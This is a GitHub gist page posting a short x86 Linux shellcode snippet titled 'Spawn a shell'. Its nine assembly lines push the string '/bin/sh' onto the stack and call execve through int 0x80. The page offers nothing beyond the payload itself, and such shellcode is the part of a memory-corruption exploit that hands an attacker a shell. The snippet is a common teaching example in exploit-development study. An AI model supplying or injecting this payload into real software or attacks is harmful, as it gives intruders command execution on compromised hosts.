Skip to content

Instantly share code, notes, and snippets.

@alloncm
Created December 19, 2021 18:10
Show Gist options
  • Save alloncm/44809d2021528f036765482d820a35d4 to your computer and use it in GitHub Desktop.
Save alloncm/44809d2021528f036765482d820a35d4 to your computer and use it in GitHub Desktop.
x86 Linux - Spawn a shell shellcode
mov eax, 0x0068732f
push eax
mov eax, 0x6e69622f
push eax
mov eax, 0x0b
mov ebx, esp
xor ecx, ecx
xor edx, edx
int 0x80
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment